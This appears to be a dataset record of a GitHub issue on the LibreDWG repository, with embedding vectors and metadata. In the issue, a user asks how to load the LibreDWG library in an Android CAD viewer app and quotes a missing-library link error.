0.003382562892511487, -0.012006510980427265, -0.0100383460521698, -0.008056072518229485, -0.0020669258665293455, -0.0033137828577309847, 0.015632448717951775, 0.008662747219204903, 0.01475770864635706, -0.011322238482534885, -0.023208824917674065, 0.004035090561956167, -0.006038527004420757, -0.024464499205350876, 0.009756172075867653, 0.006500587332993746, 0.004454824607819319, 0.017353711649775505, 0.00092059321468696, 0.0018376592779532075, 0.00999602023512125, -0.01681758090853691, 0.009657410904765129, -0.008063126355409622, -0.017099754884839058, -0.0026577278040349483, 0.028951069340109825, 0.012112325988709927, 0.01226752158254385, -0.0015431399224326015, 0.00040518445894122124, 0.004444242920726538, -0.0010890159755945206, -0.013875914737582207, 0.003675318555906415, 0.002752961590886116, 0.006842723581939936, -0.001002600067295134, -0.006708690896630287, 0.011879532597959042, 0.00487455865368247, 0.017438363283872604, 0.03936329483985901, 0.014546078629791737, 0.02803400345146656, 0.0402098186314106, 0.011456270702183247, -0.0029857554472982883, -0.007385908626019955, 0.012711945921182632, -0.004285519942641258, -0.005812787916511297, 0.019399473443627357, -0.020344756543636322, 0.03281685709953308, 0.019512344151735306, 0.013226914219558239, 0.015618340112268925, 0.06817328184843063, -0.007093152962625027, -0.007463506888598204, -0.005569412373006344, 0.010694400407373905, 0.009819661267101765, 0.0025042956694960594, -0.003204440465196967, -0.005311928689479828, 0.017071537673473358, 0.029035720974206924, 0.005322510376572609, 0.015717100352048874, 0.000904720916878432, 0.0032538208179175854, -0.001850004424341023, 0.007675137370824814, 0.013325675390660763, 0.002151577966287732, -0.014200414530932903, 0.020274214446544647, -0.00369648146443069, 0.003618883667513728, 0.005241385195404291, -0.02255982533097267, 0.005251966416835785, 0.004024508874863386, -0.025621414184570312, -0.01704332046210766, -0.014941122382879257, -0.03030550479888916, -0.006895631086081266, -0.013121098279953003, 0.016394319012761116, -0.0021480508148670197, 0.010849596932530403, -0.007079044356942177, 0.003904585028067231, -0.007315365131944418, -0.005304874386638403, 0.004511259496212006, -0.018425973132252693, -0.010200596414506435, 0.002663018647581339, 0.004701727069914341, -0.020612822845578194, -0.02704639360308647, -0.002624219749122858, -0.013502033427357674, -0.0021727411076426506, -0.00753405038267374, -0.00961508508771658, 0.013713664375245571, -0.001728316769003868, 0.009826715104281902, 0.006814505904912949, -0.018637603148818016, -0.004084471147507429, -0.021134844049811363, 0.0004448652034625411, -0.03276041895151138, -0.005382472183555365, 0.019455907866358757 ]
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
FATAL EXCEPTION: main Process: com.example.cadviwer, PID: 8631 java.lang.UnsatisfiedLinkError: dlopen failed: library "libredwg.so.0" not found: needed by /data/app/~~ymWA7_c29qFzOomORNeq8w==/com.example.cadviwer-TsQ4zoJndvEAVx0JlHtfkg==/base
How can I use the LibreDWG library on an Android smartphone?
https://api.github.com/repos/LibreDWG/libredwg/issues/844/comments
4
2023-09-20T10:22:19
2023-09-21T08:55:29Z
https://github.com/LibreDWG/libredwg/issues/844
1,904,672,980
844
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : How can I use the LibreDWG library on an Android smartphone? Issue date: --- start body --- FATAL EXCEPTION: main Process: com.example.cadviwer, PID: 8631 java.lang.UnsatisfiedLinkError: dlopen failed: library "libredwg.so.0" not found: needed by /data/app/~~ymWA7_c29qFzOomORNeq8w==/com.example.cadviwer-TsQ4zoJndvEAVx0JlHtfkg==/base --- end body ---
417
[ -0.012945258989930153, -0.017909832298755646, -0.012451470829546452, 0.0004679310950450599, 0.05463699996471405, 0.029093468561768532, 0.02016524411737919, 0.04179850593209267, 0.00066603027516976, 0.04815102741122246, -0.019431235268712044, -0.008641294203698635, -0.008874842897057533, -0.003519909456372261, 0.028452878817915916, 0.04921867698431015, -0.023528343066573143, -0.01748277246952057, -0.002086922526359558, -0.0014696873258799314, 0.052661847323179245, -0.010202732868492603, 0.03843540698289871, 0.01133711077272892, 0.01848369464278221, -0.006569385528564453, -0.0092151565477252, -0.0038268589414656162, -0.03595312312245369, -0.0079940315335989, -0.0013712632935494184, -0.0073267496190965176, 0.019457925111055374, 0.01729593425989151, 0.017829759046435356, 0.006425919942557812, 0.033924587070941925, 0.014319858513772488, -0.02260749414563179, 0.03814180567860603, -0.004414066672325134, -0.02686474844813347, 0.01720251515507698, 0.017816413193941116, -0.034138116985559464, -0.010216077789664268, 0.015200669877231121, 0.01861715130507946, -0.01602809876203537, 0.010829976759850979, -0.007273367140442133, -0.0032863609958440065, -0.017923178151249886, -0.03208288922905922, 0.036647096276283264, -0.023555032908916473, 0.02783898077905178, 0.014973795041441917, -0.02786567062139511, -0.016615306958556175, -0.031442299485206604, 0.013252208940684795, 0.035232458263635635, 0.008467800915241241, -0.012511526234447956, 0.062137242406606674, -0.030000971630215645, 0.024782830849289894, -0.039396293461322784, -0.009542124345898628, -0.00040933542186394334, 0.0017716321162879467, -0.02414224110543728, -0.019524654373526573, -0.008901533670723438, -0.02518320083618164, -0.01011598575860262, 0.05487722158432007, 0.0009083367767743766, 0.0019551345612853765, -0.022020285949110985, -0.009668907150626183, -0.07270698249340057, -0.009962511248886585, -0.018924100324511528, -0.007593662478029728, 0.0012911894591525197, -0.056745611131191254, -0.03819518908858299, 0.008621275424957275, -0.013105406425893307, 0.039289530366659164, 0.013318936340510845, -0.012344705872237682, 0.03718091920018196, -0.0015347471926361322, -0.0447879284620285, -0.02665121853351593, -0.005144739523530006, -0.04844462871551514, 0.020925944671034813, 0.02403547614812851, -0.008761405013501644, -0.005161421839147806, 0.015667766332626343, 0.005808684509247541, 0.019497962668538094, 0.006792924832552671, 0.02139304205775261, 0.07382801175117493, -0.009061681106686592, -0.047029994428157806, 0.015107250772416592, -0.015147287398576736, 0.010316170752048492, 0.03053479641675949, 0.023341502994298935, -0.04158497601747513, -0.01973818428814411, -0.007793846540153027, -0.020592303946614265, -0.03283024579286575, -0.027598759159445763, -0.04121129959821701, -0.01536081824451685, 0.008774750865995884, 0.013338955119252205, -0.03160244598984718, -0.0046676332131028175, 0.009175118990242481, -0.01724255084991455, -0.05082015320658684, 0.024355771020054817, -0.007753809913992882, 0.025703679770231247, 0.006872998550534248, -0.01580122299492359, 0.0532490573823452, 0.00023146322928369045, 0.01596137136220932, -0.0034665269777178764, -0.060482386499643326, -0.03363098204135895, -0.00638254638761282, -0.028479570522904396, 0.018176745623350143, 0.0003517824225127697, -0.012831821106374264, 0.04094438627362251, -0.01596137136220932, -0.02674463763833046, -0.0035299186129122972, 0.011150272563099861, -0.008821460418403149, 0.033764440566301346, -0.004744370933622122, -0.018937446177005768, -0.011744152754545212, 0.0012002724688500166, 0.025823790580034256, 0.009809036739170551, -0.015734495595097542, 0.010589756071567535, -0.04804426059126854, -0.02506309002637863, -0.014960449188947678, 0.009442031383514404, 0.00860793050378561, -0.05079346150159836, 0.020365428179502487, -0.0377948172390461, -0.0106031009927392, 0.031575754284858704, 0.023434922099113464, -0.03819518908858299, 0.008794768713414669, -0.008127487264573574, 0.027758905664086342, -0.00931524857878685, -0.041905272752046585, 0.006142325233668089, -0.006979763507843018, 0.014813646674156189, 0.020952636376023293, -0.013732651248574257, 0.020578958094120026, 0.043159760534763336, -0.02813258394598961, -0.007787174079567194, 0.024836214259266853, -0.031468991190195084, -0.02015189826488495, 0.003214628202840686, 0.004877827130258083, 0.027491994202136993, -0.044360868632793427, -0.017749685794115067, -0.031175386160612106, -0.008547875098884106, 0.009802363812923431, -0.03710084408521652, 0.01973818428814411, -0.013612540438771248, 0.01848369464278221, -0.010256115347146988, 0.008227579295635223, 0.00604223320260644, 0.03710084408521652, 0.010422935709357262, -0.029093468561768532, 0.005595154594630003, 0.0079606669023633, -0.022260507568717003, 0.0049879285506904125, -0.0013962863013148308, 0.024462535977363586, 0.04420071840286255, 0.004757716320455074, -0.03221634775400162, -0.01589464209973812, -0.006352519150823355, -0.03851548209786415, 0.019097594544291496, 0.019030865281820297, -0.00460424181073904, 0.0029560565017163754, 0.0185637678951025, 0.009108390659093857, -0.0040837619453668594, 0.0007294219685718417, 0.08754731714725494, -0.014359896071255207, 0.030374649912118912, 0.010896705090999603, 0.023328157141804695, -0.007633699104189873, 0.027331845834851265, -0.028266040608286858, -0.06768902391195297, 0.011624041944742203, 0.014947103336453438, -0.007033145986497402, -0.0030995220877230167, -0.03165582939982414, 0.012991968542337418, -0.0004429080290719867, -0.017109094187617302, 0.05039308965206146, 0.006946399342268705, -0.0067862519063055515, 0.01855042204260826, -0.0037034116685390472, 0.036486946046352386, -0.011030161753296852, 0.015480928122997284, 0.003923614509403706, 0.0428127758204937, 0.009235174395143986, -0.0014905398711562157, 0.005918785929679871, 0.03819518908858299, -0.006018878426402807, -0.026918131858110428, -0.014426623471081257, -0.003786821849644184, 0.003024452831596136, -0.005098029971122742, 0.0026307569351047277, 0.027118315920233727, -0.0012503184843808413, -0.01744273491203785, -0.04708337411284447, -0.012471489608287811, 0.018830681219697, -0.05316898226737976, -0.01584126055240631, -0.017549501731991768, -0.0024172267876565456, 0.06235077232122421, 0.001335396897047758, -0.016722071915864944, 0.01398621778935194, -0.014920411631464958, -0.016254974529147148, 0.012631637044250965, -0.017536155879497528, -0.032696787267923355, -0.03635349124670029, 0.00005901269832975231, 0.013972872868180275, -0.01524070743471384, -0.00319127319380641, -0.02248738333582878, -0.012291323393583298, 0.010322843678295612, -0.005718601401895285, -0.023461613804101944, -0.06277783215045929, 0.029867514967918396, -0.03589973971247673, -0.008647967129945755, -0.051140446215867996, 0.03552606329321861, -0.024355771020054817, 0.024302389472723007, -0.00434066541492939, 0.024315733462572098, 0.03899592533707619, 0.0038502137176692486, -0.005812020972371101, 0.07340095192193985, -0.018990827724337578, -0.02388867363333702, 0.016468504443764687, 0.005788666196167469, 0.008027395233511925, -0.021873483434319496, -0.016615306958556175, 0.03216296434402466, 0.0029760750476270914, 0.009555469267070293, 0.027705524116754532, -0.05701252445578575, 0.006355855148285627, 0.06245753914117813, -0.006349182687699795, -0.038061730563640594, 0.0022954479791224003, -0.034058041870594025, -0.005341587588191032, 0.034351646900177, 0.0021302958484739065, 0.011176963336765766, 0.00469432445243001, -0.031468991190195084, -0.015694458037614822, -0.0212062019854784, 0.0049445549957454205, 0.03472532331943512, 0.018069980666041374, -0.01730928011238575, 0.02398209273815155, -0.020632341504096985, -0.0401703417301178, -0.012531545013189316, -0.02386198192834854, 0.02799912728369236, 0.03816849738359451, 0.018216781318187714, 0.00005942974894423969, 0.0008949911571107805, 0.03456517681479454, 0.01269836537539959, -0.016668688505887985, -0.004847799427807331, -0.022861061617732048, 0.005875412840396166, -0.04484131187200546, -0.022247161716222763, 0.014439969323575497, -0.0064659565687179565, -0.014426623471081257, 0.011297074146568775, 0.006852979771792889, -0.005845385137945414, 0.047296904027462006, -0.0056084999814629555, 0.0028793192468583584, -0.016668688505887985, 0.00283094123005867, 0.03347083553671837, 0.03048141486942768, 0.0026591164059937, -0.01740269921720028, -0.048604778945446014, -0.014560080133378506, 0.030241193249821663, 0.013525794260203838, 0.004067080095410347, 0.017109094187617302, -0.026064012199640274, 0.008481146767735481, -0.021940212696790695, -0.024676065891981125, 0.06843637675046921, 0.002769217826426029, 0.0307216364890337, 0.03896923363208771, -0.021993594244122505, -0.01848369464278221, -0.022847715765237808, 0.0012436456745490432, 0.015294089913368225, -0.00434066541492939, -0.0024889595806598663, 0.03349752724170685, 0.022033631801605225, 0.006719523575156927, 0.047350287437438965, -0.0039002597332000732, -0.0076003349386155605, -0.009515432640910149, 0.026918131858110428, 0.003316388465464115, 0.011844244785606861, 0.0007999035879038274, -0.003509900067001581, -0.025703679770231247, -0.008200888521969318, 0.012271304614841938, -0.035179074853658676, 0.00247561396099627, -0.02783898077905178, -0.011604023166000843, 0.010829976759850979, 0.020725760608911514, -0.023648452013731003, 0.02511647157371044, -0.014666845090687275, 0.0018366920994594693, 0.006979763507843018, -0.006919708102941513, -0.011717461049556732, 0.012331360019743443, -0.02379525452852249, -0.004574214108288288, 0.018056634813547134, 0.03851548209786415, -0.0049879285506904125, -0.047029994428157806, 0.0030995220877230167, 0.01470688171684742, 0.04502815008163452, 0.04622925445437431, -0.024622684344649315, 0.027011550962924957, -0.025690333917737007, -0.004233900457620621, -0.051167137920856476, 0.011010142974555492, -0.025570223107933998, 0.0007381800678558648, -0.045989032834768295, 0.00869467668235302, -0.002205365104600787, -0.03891585022211075, -0.029814133420586586, -0.006352519150823355, 0.059361353516578674, -0.05578472465276718, 0.011056852526962757, 0.022033631801605225, 0.010282806120812893, -0.03595312312245369, -0.003384784795343876, -0.011036834679543972, -0.02802581898868084, 0.024382462725043297, 0.030828401446342468, -0.030828401446342468, 0.013559157960116863, -0.013479084707796574, -0.022927789017558098, 0.012291323393583298, 0.00700645474717021, 0.04908521845936775, 0.039262838661670685, -0.04711006581783295, -0.002545678522437811, 0.011183636263012886, -0.00928188394755125, 0.007827211171388626, 0.047350287437438965, -0.005288205109536648, -0.030161119997501373, -0.010823304764926434, 0.005905440542846918, -0.027572067454457283, 0.009442031383514404, -0.03491216152906418, -0.00920181069523096, 0.01574784144759178, 0.004237236920744181, -0.055197518318891525, 0.008054086938500404, -0.0395030602812767, -0.005688573699444532, 0.005161421839147806, -0.03205619752407074, 0.02012520655989647, 0.02258080244064331, 0.05287537723779678, -0.03878239542245865, -0.03894254192709923, -0.02650441788136959, 0.024649374186992645, -0.005968831945210695, -0.02113947458565235, 0.02148646116256714, 0.046175871044397354, -0.009348612278699875, 0.0010618115775287151, -0.007106546778231859, -0.03304377570748329, 0.024609338492155075, -0.01464015431702137, -0.022353926673531532, 0.03557944297790527, -0.007146583870053291, 0.008160851895809174, 0.060589149594306946, -0.027318499982357025, -0.026277542114257812, -0.008374381810426712, -0.0065126665867865086, -0.0224606916308403, 0.002745863050222397, -0.0077204457484185696, 0.044521015137434006, 0.012131175957620144, -0.01536081824451685, 0.0032513285987079144, -0.010342861525714397, 0.018283510580658913, 0.015000485815107822, 0.03728768602013588, 0.00010770338849397376, 0.0020552268251776695, -0.003956978674978018, 0.007300058379769325, 0.019084248691797256, 0.01144387573003769, -0.027198389172554016, 0.04481462016701698, -0.02108609303832054, 0.029920898377895355, -0.0006038896390236914, -0.017829759046435356, 0.029653985053300858, -0.011764171533286572, -0.02380860038101673, 0.023141318932175636, -0.010162695311009884, 0.016601961106061935, -0.018069980666041374, 0.0010151017922908068, -0.029974279925227165, -0.0025907200761139393, -0.000473352731205523, 0.02917354367673397, -0.021032709628343582, 0.01124369166791439, 0.009875765070319176, -0.015507619827985764, -0.015040522441267967, 0.03216296434402466, 0.04780403897166252, -0.016588615253567696, 0.0010609774617478251, -0.014880375005304813, -0.008160851895809174, 0.01880398951470852, 0.008741386234760284, -0.026184123009443283, 0.005538435652852058, -0.024902941659092903, 0.004450766835361719, 0.0021152819972485304, 0.0027792269829660654, -0.03768805414438248, 0.002760876901447773, -0.005445016082376242, 0.02674463763833046, 0.031362224370241165, -0.00025148168788291514, 0.00434066541492939, 0.004260591696947813, 0.001603143522515893, 0.00247895042411983, -0.020739106461405754, 0.027572067454457283, -0.024662720039486885, 0.0005279863835312426, -0.00030569828231818974, 0.0042772735469043255, 0.01075657643377781, -0.030161119997501373, -0.009175118990242481, 0.011090217158198357, -0.03344414383172989, 0.008280961774289608, 0.00035219945129938424, 0.013745997101068497, -0.00247895042411983, 0.017722994089126587, -0.01718916930258274, 0.033737748861312866, 0.02807920053601265, 0.00566855538636446, -0.04118460789322853, -0.01134378369897604, 0.01460011675953865, 0.015000485815107822, -0.017015675082802773, -0.03605988621711731, 0.005778656806796789, 0.022327234968543053, -0.0319761261343956, -0.010783267207443714, 0.0004454103473108262, 0.01401290949434042, -0.002849291544407606, 0.024769484996795654, 0.01714913174510002, 0.006305809132754803, -0.03325730562210083, 0.0030828400049358606, 0.010222750715911388, -0.01857711374759674, 0.0032947019208222628, -0.009115063585340977, -0.0026107383891940117, -0.033844511955976486, -0.008120814338326454, 0.0043273200280964375, 0.03296370059251785, -0.008647967129945755, -0.021579880267381668, -0.0007035648450255394, 0.005211467854678631, -0.014653499238193035, -0.014306513592600822, -0.0034465084318071604, 0.013719305396080017, -0.053809572011232376, 0.019511308521032333, 0.022073669359087944, 0.004417402669787407, -0.029787441715598106, 0.009008298628032207, -0.0036466929595917463, 0.023127973079681396, -0.029734058305621147, 0.0154275456443429, -0.009875765070319176, 0.015520965680480003, 0.004404057282954454, -0.016962293535470963, 0.013419029302895069, 0.04131806269288063, -0.03595312312245369, -0.009862419217824936, 0.020472193136811256, -0.0022087013348937035, 0.020885907113552094, -0.015641076490283012, 0.03328399732708931, 0.025957247242331505, 0.005408315919339657, 0.02538338489830494, 0.004073753021657467, 0.036727167665958405, -0.017843104898929596, -0.016388431191444397, 0.009682253003120422, -0.010890032164752483, 0.020258663222193718, -0.002946047345176339, 0.0152273615822196, -0.014893720857799053, 0.009882437065243721, -0.021579880267381668, -0.02023197151720524, -0.004380702506750822, 0.0005822030361741781, -0.001337065128609538, 0.011457221582531929, -0.009428686462342739, 0.0014021249953657389, 0.010816631838679314, 0.02507643587887287, -0.016988985240459442, 0.027225080877542496, 0.006872998550534248, -0.040517326444387436, -0.0049545643851161, -0.010356207378208637, -0.041905272752046585, -0.023114627227187157, -0.015681112185120583, 0.00603222381323576, -0.004771062172949314, 0.015587693080306053, 0.03304377570748329, -0.008561220020055771, -0.024996360763907433, 0.020432155579328537, -0.006599413231015205, -0.029066776856780052, -0.000284428708255291, -0.03162913769483566, -0.003042803145945072, 0.017616229131817818, -0.0078005194664001465, 0.01610817387700081, 0.004490803927183151, 0.0003121625923085958, -0.016762109473347664, -0.004684315528720617, 0.005708592478185892, -0.014453315176069736, -0.004427412059158087, -0.02390201948583126, 0.030347958207130432, 0.00301778013817966, 0.0024138905573636293, -0.01585460640490055, -0.008554547093808651, -0.012358051724731922, 0.0028960013296455145, -0.04388042539358139, -0.02379525452852249, -0.0028092546854168177, 0.012111157178878784, 0.012598272413015366, 0.009495413862168789, -0.0035732919350266457, -0.016842182725667953, 0.03597981482744217, 0.004257255233824253, 0.01409298274666071, -0.014373240992426872, 0.022046977654099464, 0.011283728294074535, -0.01074323058128357, -0.023141318932175636, 0.045722123235464096, 0.011176963336765766, 0.004677642602473497, -0.0011135258246213198, -0.010789940133690834, 0.011830898933112621, -0.00034677781513892114, -0.025623606517910957, 0.007033145986497402, -0.0011068530147895217, -0.02128627710044384, 0.0175761915743351, -0.04278608411550522, -0.014226439408957958, 0.012958604842424393, 0.026344269514083862, -0.0101093128323555, -0.03360429033637047, 0.024249006062746048, -0.014466661028563976, 0.020472193136811256, -0.008748059161007404, 0.0253033097833395, 0.00857456587255001, -0.02658449113368988, 0.01742939092218876, -0.06037561967968941, 0.04775065556168556, 0.04270600900053978, 0.015093904919922352, 0.012538217939436436, -0.016308357939124107, 0.007473551668226719, -0.009068354032933712, 0.0019100930076092482, 0.009528778493404388, -0.00992914754897356, -0.004394047893583775, -0.009969184175133705, -0.015627730637788773, -0.02402213029563427, 0.005508407950401306, -0.006138988770544529, 0.023461613804101944, -0.01338566467165947, -0.004167172126471996, -0.00033489183988422155, 0.025743717327713966, 0.01585460640490055, -0.0152273615822196, 0.0013062033103778958, -0.004420739132910967, 0.010416262783110142, -0.018336892127990723, -0.03200281411409378, 0.002153650624677539, 0.05882752686738968, -0.04534844309091568, 0.05621178448200226, -0.004300628788769245, 0.005394970066845417, 0.00011145684402436018, -0.02400878444314003, -0.022167088463902473, 0.018123362213373184, -0.015000485815107822, -0.011477240361273289, -0.039316218346357346, -0.021112782880663872, 0.017989907413721085, -0.03493885323405266, 0.027104970067739487, -0.03581966459751129, 0.0077271186746656895, 0.008287634700536728, 0.007773828227072954, -0.012037756852805614, 0.04553528130054474, 0.016708726063370705, 0.0011910973116755486, -0.009455377236008644, 0.006172352936118841, 0.03053479641675949, 0.021726682782173157, -0.04390711709856987, 0.025596914812922478, 0.01597471721470356, 0.0031979461200535297, -0.00629580020904541, -0.049912650138139725, 0.05631855130195618, 0.03192274272441864, 0.032750170677900314, 0.030161119997501373, 0.011577332392334938, 0.006919708102941513, 0.010202732868492603, -0.003596646711230278, 0.006062251515686512, 0.015400854870676994, 0.022260507568717003, 0.01585460640490055, -0.023341502994298935, 0.037954967468976974, -0.03349752724170685, -0.01875060796737671, -0.0035532733891159296, -0.03547267988324165, -0.03851548209786415, -0.007280040066689253, -0.028773173689842224, -0.02671794779598713, 0.00006260976078920066, 0.04812433570623398, 0.04297292232513428, 0.0018200100166723132, -0.025863826274871826, 0.048604778945446014, -0.0046709696762263775, 0.00016317114932462573, 0.014199748635292053, -0.00627911789342761, 0.007139910943806171, -0.007807192392647266, 0.01389279868453741, -0.019391197711229324, -0.01402625534683466, -0.03162913769483566, 0.007753809913992882, -0.02422231435775757, -0.0002456429647281766, -0.013826070353388786, -0.01582791469991207, 0.0069864364340901375, -0.004387375432997942, 0.008808114565908909, 0.025757061317563057, -0.019391197711229324, -0.01995171420276165, -0.0014947103336453438, -0.01062311977148056, -0.007086528465151787, 0.009482068940997124, -0.001233636518009007, -0.013419029302895069, 0.019457925111055374, -0.032536640763282776, -0.019538000226020813, 0.005605163984000683, -0.029974279925227165, 0.01624162867665291, -0.019204359501600266, -0.003606655867770314, -0.022233815863728523, 0.011924318969249725, -0.005992187187075615, -0.014052946120500565, -0.021886829286813736, 0.025877172127366066, 0.03050810471177101, -0.025690333917737007, -0.015173979103565216, -0.010676502250134945, -0.0018166735535487533, 0.0011835903860628605, 0.018110016360878944, 0.019137630239129066, -0.005268186796456575, 0.0002498134854249656, -0.0001753698888933286, 0.020819179713726044, -0.0040003517642617226, -0.00024835378280840814, 0.03579297289252281, 0.015254052355885506, -0.018096672371029854, 0.01593467965722084, 0.01277176570147276, 0.0016298347618430853, 0.01267167367041111, -0.03176259621977806, 0.027545375749468803, 0.014653499238193035, 0.027104970067739487, -0.02140638791024685, 0.01889740861952305, -0.02153984270989895, 0.008734713308513165, -0.0005321569042280316, -0.0347520150244236, -0.030161119997501373, 0.020845871418714523, -0.006879671011120081, 0.006075597368180752, 0.005401642993092537, 0.010683175176382065, 0.019177667796611786, -0.0034264898858964443, -0.023034553974866867, -0.004077089484781027, -0.020392119884490967, -0.03221634775400162, -0.01997840590775013, -0.03827526047825813, 0.013612540438771248, -0.02408885769546032, 0.036406874656677246, -0.0292002335190773, 0.00033676857128739357, 0.00247561396099627, -0.02129962295293808, 0.008227579295635223, -0.012544889934360981, -0.026050666347146034, -0.014653499238193035, -0.02681136690080166, 0.0076136807911098, 0.0005171431112103164, 0.0005467536975629628, 0.015013831667602062, -0.002283770591020584, 0.024369116872549057, 0.006726196501404047, 0.035419296473264694, -0.008174196816980839, 0.015561002306640148, -0.01208446640521288, 0.0051881130784749985, -0.016268320381641388, 0.03846209868788719, -0.012818475253880024, -0.016254974529147148, -0.02148646116256714, -0.023688489571213722, 0.014426623471081257, 0.02912016026675701, 0.02658449113368988, -0.005481716711074114, -0.008234252221882343, 0.015707803890109062, -0.03560613468289375, 0.0036533656530082226, -0.0030911811627447605, 0.0101093128323555, -0.01871057040989399, -0.0023037891369313, 0.0036300108768045902, 0.014213093556463718, -0.010816631838679314, -0.00927521102130413, 0.036727167665958405, 0.015681112185120583, 0.008621275424957275, 0.00023563374998047948, -0.013625886291265488, 0.02151315286755562, 0.0002652443654369563, -0.028559643775224686, -0.007186620496213436, 0.0076136807911098, 0.026317577809095383, 0.0047944169491529465, -0.03491216152906418, -0.012318015098571777, -0.015013831667602062, -0.013132098130881786, -0.003328066086396575, -0.01877729780972004, 0.013152115978300571, 0.009889109991490841, 0.0024072176311165094, 0.01390614453703165, -0.006239081267267466, -0.0019184340490028262, -0.004514158703386784, 0.019271086901426315, 0.008908206596970558, -0.020565612241625786, 0.0031662501860409975, -0.010843322612345219, 0.00031862687319517136, -0.00019757785776164383, 0.009028317406773567, 0.006215726025402546, 0.004637605510652065, -0.01750946417450905, -0.0014780282508581877, -0.01462680846452713, 0.00929522980004549, 0.012785111553966999, 0.0007765487534925342, 0.019017519429326057, 0.030000971630215645, 0.0008666317444294691, 0.005948813632130623, 0.01061644684523344, 0.011924318969249725, -0.0016698717372491956, -0.0076470449566841125, -0.027598759159445763, 0.0030861764680594206, -0.039156071841716766, -0.004751043394207954, 0.01197102852165699, 0.06283121556043625, 0.004557531792670488, 0.02527661994099617, 0.0034398355055600405, -0.016335047781467438, -0.00028025818755850196, 0.02526327408850193, -0.0033964624162763357, -0.00010676502279238775, -0.016842182725667953, 0.010069276206195354, 0.014907066710293293, 0.04497476667165756, -0.01868387870490551, 0.017923178151249886, -0.01577453315258026, 0.012785111553966999, -0.007640372030436993, -0.000570525589864701, -0.01060977391898632, -0.014546734280884266, -0.02395540289580822, 0.017682956531643867, -0.0036466929595917463, -0.01605479046702385, 0.008427764289081097, -0.0036266744136810303, -0.014413278549909592, -0.01988498494029045, 0.02912016026675701, 0.0008824796532280743, 0.02674463763833046, -0.018964137881994247, -0.013565830886363983, 0.048551395535469055, -0.012638309970498085, 0.005204794928431511, -0.004384038969874382, -0.010689848102629185, -0.020899252966046333, 0.0152273615822196, -0.015654422342777252, -0.004801089875400066, 0.01734931580722332, -0.03464525192975998, 0.03357759863138199, -0.0022370608057826757, -0.02671794779598713, 0.0041271355003118515, 0.0015881297877058387, -0.015454237349331379, -0.02797243557870388, -0.009361958131194115, -0.003796831239014864, -0.02131296880543232, -0.03285693749785423, -0.005384960677474737, 0.05308890715241432, -0.006479302421212196, -0.006415910553187132, -0.007039818912744522, -0.0030778355430811644, 0.01398621778935194, -0.014987139962613583, -0.019711492583155632, -0.028346113860607147, 0.0161882471293211, 0.008627948351204395, 0.004771062172949314, 0.0212062019854784, 0.007827211171388626, 0.0017332634888589382, -0.02420896850526333, 0.016655344516038895, -0.02153984270989895, 0.017856450751423836, 0.003107863012701273, -0.023368194699287415, 0.007166602183133364, 0.01851038634777069, -0.022247161716222763, 0.013525794260203838, -0.012718383222818375, 0.003599983174353838, -0.019658109173178673, 0.003041134914383292, 0.0053315781988203526, -0.0020385447423905134, 0.014333204366266727, 0.0029577247332781553, -0.000027004043658962473, -0.0019651437178254128, -0.036673784255981445, 0.011210327968001366, -0.010769921354949474, -0.011897627264261246, 0.01987164095044136, -0.01536081824451685, -0.01721586100757122, -0.005955486558377743, -0.005378288216888905, -0.005411652382463217, -0.015654422342777252, 0.006809606682509184, 0.0050680022686719894, 0.009155101142823696, 0.007206639274954796, 0.02954722009599209, -0.01984494924545288, 0.021980248391628265, -0.0034498448949307203, 0.012224595062434673, 0.019297778606414795, -0.004587559495121241, -0.002378858160227537, -0.016668688505887985, 0.0022954479791224003, 0.00046042416943237185, -0.0007903114310465753, -0.028906630352139473, 0.009468723088502884, 0.01848369464278221, 0.0214731153100729, -0.04409395530819893, 0.008114141412079334, -0.010596428997814655, 0.012257959693670273, -0.020325390622019768, 0.02952052839100361, -0.005792002659291029, -0.01195768266916275, 0.005037974566221237, 0.0028159276116639376, 0.008941570296883583, 0.05420994013547897, -0.005091357044875622, -0.005781993269920349, 0.044867999851703644, 0.019097594544291496, 0.0009750649333000183, 0.01876395381987095, -0.014079637825489044, 0.020312046632170677, -0.012484834529459476, -0.029013395309448242, -0.009675580076873302, -0.026290887966752052, 0.02653110772371292, 0.017829759046435356, 0.012411434203386307, 0.003780149156227708, -0.0008024058770388365, -0.030908474698662758, 0.010816631838679314, 0.0076070078648626804, -0.02527661994099617, 0.0005492559866979718, 0.008854824118316174, 0.00603222381323576, 0.01865718886256218, -0.011797535233199596, 0.03579297289252281, 0.018283510580658913, 0.01879064366221428, 0.0004866983799729496, 0.02546345815062523, -0.014560080133378506, -0.006252426654100418, -0.0006714519113302231, 0.000027864211006090045, -0.018283510580658913, 0.00434733834117651, -0.0004445762315299362, 0.022287199273705482, 0.0035432642325758934, 0.011016815900802612, -0.0005117214168421924, -0.019271086901426315, -0.03363098204135895, -0.005368278827518225, -0.01532078068703413, -0.011010142974555492, 0.024836214259266853, -0.00993582047522068, -0.012825148180127144, 0.005701919551938772, 0.01851038634777069, 0.03702077269554138, -0.013092061504721642, -0.003966988064348698, -0.021619917824864388, 0.02003178745508194, -0.04553528130054474, 0.005855394061654806, -0.011470567435026169, -0.018830681219697, 0.008341017179191113, -0.04652285948395729, 0.004927873145788908, 0.006425919942557812, 0.009582160972058773, -0.006452611181885004, -0.022073669359087944, -0.016588615253567696, -0.01594802550971508, 0.020445501431822777, 0.021659953519701958, -0.0026591164059937, -0.011290401220321655, 0.044494323432445526, -0.020191935822367668, 0.017642920836806297, 0.013158788904547691, 0.015187324956059456, -0.03768805414438248, 0.005034638103097677, -0.003760130610316992, -0.0011085212463513017, 0.006979763507843018, 0.00942201353609562, -0.016935601830482483, -0.02247403748333454, 0.016561923548579216, 0.0049445549957454205, 0.006679486948996782, -0.03443172201514244, -0.03152237460017204, 0.00806743185967207, -0.008194215595722198, 0.013005314394831657, 0.0010117654455825686, 0.0069864364340901375, -0.01975153014063835, 0.010329515673220158, 0.029787441715598106, -0.0013445720542222261, -0.036380182951688766, -0.0070598372258245945, 0.01983160339295864, -0.0067095146514475346, -0.018937446177005768, 0.024382462725043297, -0.02778559736907482, -0.00047919145436026156, -0.002817595610395074, -0.004193863365799189, 0.024649374186992645, -0.00460090534761548, 0.025797098875045776, -0.014867029152810574, -0.02914685197174549, 0.029920898377895355, -0.0010201064869761467, -0.007633699104189873, -0.005368278827518225, 0.023261429741978645, -0.0029110151808708906, 0.010429608635604382, 0.025596914812922478, 0.0019117612391710281, -0.0015013831434771419, 0.00470767030492425, -0.023621762171387672, -0.016735417768359184, -0.017936524003744125, 0.020525576546788216, -0.0011935996590182185, -0.00434733834117651, 0.0004758550494443625, 